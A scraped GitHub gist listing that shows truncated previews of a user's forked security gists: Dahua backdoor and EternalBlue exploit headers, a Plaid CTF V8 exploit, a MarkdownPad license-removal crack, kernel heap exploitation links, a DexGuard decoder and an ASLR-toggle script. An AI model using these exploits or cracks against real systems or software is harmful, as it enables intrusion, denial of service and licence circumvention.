
@huyna
huyna / dahua-backdoor.py
Created November 16, 2017 01:14 — forked from cre8tions/dahua-backdoor.py
dahua exploit poc
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
#Jacked from git history
#
import string
@huyna
huyna / eternalblue8_exploit.py
Created May 18, 2017 01:50 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
@huyna
huyna / js_sandbox.js
Created April 26, 2017 02:00 — forked from sroettger/js_sandbox.js
Exploit for the js_sandbox challenge of Plaid CTF 2016
with (true) {
// f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16.
// take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening
function f(){
var x = 8;
var y = 0xffffffff;
var ind = x & y;
x = 16;
y = 0xffffffff;
var ind2 = ind + (x&y);
Click "Start" and "Run."
Type "regedit" without the quotation marks to open the registry editor.
Expand "HKEY_LOCAL_MACHINE" and go to "Software." Click on "Microsoft," "WindowsNT," "Current Version" and "AeDebug."
Double-click the registry key "Debugger" on the right-window pane.
Change the entry to "drwtsn32 -p %ld -e %ld -g" -- including the quotation marks -- to change the post-mortem debugger back to its default.
Click "OK" and close the registry editor.
@huyna
huyna / LicenseEngine.cs
Created March 23, 2016 22:18 — forked from gythialy/LicenseEngine.cs
remove license validation of MarkdownPad 2 by Mono Cecil
public bool VerifyLicense(string licenseKey, string email)
{
if (string.IsNullOrEmpty(licenseKey) || string.IsNullOrEmpty(email))
{
return false;
}
try
{
this.License = this.Decrypt(licenseKey);
this.LicenseProcessed = true;
@huyna
huyna / slab slub
Last active April 13, 2023 14:42
http://phrack.org/issues/64/6.html
https://loccs.sjtu.edu.cn/~romangol/download/papers/gossip_ccs2015.pdf
http://resources.infosecinstitute.com/exploiting-linux-kernel-heap-corruptions-slub-allocator/
http://www.slideshare.net/nullthreat/fund-linux-priv-esc-wprotections
http://www.slideshare.net/sciosecurity/linux-kernel-exploitation
http://events.linuxfoundation.org/sites/events/files/slides/slaballocators.pdf
https://github.com/xairy/kaslr-bypass-via-prefetch
http://www.jikos.cz/jikos/Kmalloc_Internals.html
https://github.com/Fuzion24/AndroidKernelExploitationPlayground
http://dcjtech.info/topic/linux-kernel-slab-allocators/
@huyna
huyna / DexGuardDecoder.java
Created March 9, 2016 12:05 — forked from AKosterin/DexGuardDecoder.java
New Dexguard String decoder for JEB 1.5. Tested on GFE 3.1.3. This release auto-parses the decoder function.
import jeb.api.IScript;
import jeb.api.JebInstance;
import jeb.api.ast.*;
import jeb.api.ast.Class;
import jeb.api.dex.*;
import jeb.api.ui.JavaView;
import jeb.api.ui.View;
import java.util.Arrays;
import java.util.HashMap;
@ECHO OFF
SETLOCAL
ECHO ASLR Enable / Disable Batch Script - Please run as admin
set /p Choice=Want to Enable or Disable ASLR? (e or d):%=%
if "%Choice%"=="e" goto :ENABLE
if "%Choice%"=="d" goto :DISABLE
:ENABLE